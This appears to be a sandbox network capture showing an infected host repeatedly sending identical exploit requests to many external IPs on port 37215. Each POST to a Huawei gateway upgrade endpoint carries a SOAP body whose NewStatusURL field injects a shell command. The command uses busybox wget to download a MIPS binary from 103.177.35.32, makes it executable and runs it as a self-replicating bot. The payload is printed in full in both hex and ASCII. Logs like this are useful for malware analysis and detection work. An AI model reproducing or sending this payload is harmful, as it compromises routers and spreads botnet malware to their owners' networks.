                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1551192.168.2.2355058167.59.221.7237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.548247099 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1552192.168.2.2357960157.240.41.18537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.548280954 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1553192.168.2.2332984213.34.122.7737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.548280954 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1554192.168.2.2359552157.107.97.13937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.548288107 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1555192.168.2.234058441.142.38.8737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.548306942 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1556192.168.2.233320041.28.88.21037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.548309088 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1557192.168.2.2343878195.56.77.12137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.548624039 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1558192.168.2.234900841.252.82.19337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.549097061 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1559192.168.2.2337596197.132.209.25037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.549185038 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1560192.168.2.234914241.50.165.22637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.549235106 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
